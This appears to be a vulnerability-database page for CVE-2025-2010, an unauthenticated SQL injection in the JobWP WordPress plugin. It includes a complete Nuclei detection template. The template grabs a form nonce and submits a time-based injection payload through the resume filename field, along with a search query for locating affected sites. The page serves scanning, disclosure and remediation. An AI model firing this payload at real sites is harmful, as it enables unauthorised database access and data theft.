WordPress JobWP Plugin <= 2.3.9 - SQL Injection
CVE-2025-2010
Verified
Description
The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Severity
Critical
CVSS Score
7.5
Exploit Probability
16%
Affected Product
jobwp
Published Date
July 9, 2025
Template Author
iamnoooob, rootxharsh, pdresearch
CVE-2025-2010.yaml
id: CVE-2025-2010
info:
name: WordPress JobWP Plugin <= 2.3.9 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Successful exploitation could allow an attacker to execute arbitrary SQL queries, potentially leading to data exfiltration, privilege escalation, or other malicious activities.
remediation: |
Update the JobWP Plugin to version later than 2.3.9. Alternatively, implement proper input validation and sanitization controls.
reference:
- https://wpscan.com/vulnerability/26713902-26d8-47e3-b651-fe30d9898270/
- https://nvd.nist.gov/vuln/detail/CVE-2025-2010
classification:
epss-score: 0.15626
epss-percentile: 0.9437
cve-id: CVE-2025-2010
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
product: jobwp
fofa-query: body="/wp-content/plugins/jobwp"
tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp
flow: http(1) && http(2)
variables:
jobid: "{{jobid}}"
http:
- raw:
- |
GET /jobs/{{jobid}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: nonce
group: 1
regex:
- 'jobwp_apply_form_nonce_field" value="([a-z0-9]+)"'
internal: true
- raw:
- |
@timeout: 30s
POST /jobs/{{jobid}}/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUzdqU65JI5EA04B
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_apply_form_nonce_field"
{{nonce}}
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="x"
/jobs/{{jobid}}/
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_apply_for"
x
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_full_name"
x
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_email"
x@x.com
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_cover_letter"
x
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_upload_resume"; filename="xxxxxx\"*sleep(7)*\".pdf"
Content-Type: application/pdf
x
------WebKitFormBoundaryEUzdqU65JI5EA04B--
matchers:
- type: dsl
dsl:
- 'duration>=7'
- "status_code == 200"
- "contains_all(body, 'jobwp-', 'apply-')"
condition: and
# digest: 4a0a00473045022100d1383aeb6a17bb34135f480d0714b2c5c5fa89b9756b10af9fd3bcf68322e9c502200753635f6b56c4c5a7fe8509f9eb96150c62208d07768b959d53e94181db1b0b:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-2010
CWE ID:
cwe-89
Remediation Steps
Update the JobWP Plugin to version later than 2.3.9. Alternatively, implement proper input validation and sanitization controls.